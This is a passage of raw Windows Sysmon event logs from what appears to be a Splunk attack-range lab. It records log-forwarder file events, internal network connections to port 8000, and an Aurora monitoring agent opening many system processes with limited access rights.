Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBACFC62C40ED802FB158E72DDA73E65,SHA256=F8E27516C93AFDE2632294E50C2FA34BAF3C97A059D3D1E54CCA184F3FE3334C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017360Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:19.328{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C690987CDF43D771DA77259A44CA6357,SHA256=566A657B4FC86EC5543C2356BEE329E957CE80E97DF19E67035042B9D49BE089,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044882Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:16.625{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56404-false10.0.1.12-8000- 23542300x800000000000000044884Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:20.660{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7633E2E9C27F5688D4A176B020D03BE4,SHA256=87393AD768521E0C4746B21FA0178749DBF3D0DCABE6C2C6F02BF6C320E61DE2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017361Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:20.406{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=170E67C0E2550E3D160D1CC66928B56D,SHA256=20C20C7A34F91899B57E0CB0D8DE4CAD6478C4001A49FE1EAB9CD0DB820EEEA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017363Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:21.486{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C8AD666A401C70BF7A1215044E341AF,SHA256=1F1195580ACF5CDF9413875FA1C7A71D32AE326C8C62A1010AA361AAD6772D68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044885Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:21.765{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6E56C26397B523D9918969FF36EFD68,SHA256=A649FF3737DA37014B05BBC2AD654356B0C551E16C6E355DB15BF6D79F06B530,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000017362Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:18.908{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50135-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 10341000x800000000000000017395Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.729{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017394Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.725{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017393Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.722{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017392Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.715{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017391Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.711{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017390Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.709{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017389Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.708{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017388Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.703{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017387Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.701{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017386Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.697{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017385Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.695{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017384Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.681{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017383Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.676{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017382Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.674{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017381Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.667{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017380Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.665{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017379Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.655{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017378Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.653{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017377Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.639{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017376Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.634{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017375Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.626{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017374Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.614{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017373Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.607{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 23542300x800000000000000017372Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.579{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E795CFEA2766744A7170C9D16C786804,SHA256=0AE8ED04A2BB1EFBD5A890A1E59D50E404050CE36FD2C96D5278EDE9B90D2B04,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000017371Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.560{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017370Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.552{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017369Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.548{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017368Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.543{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program 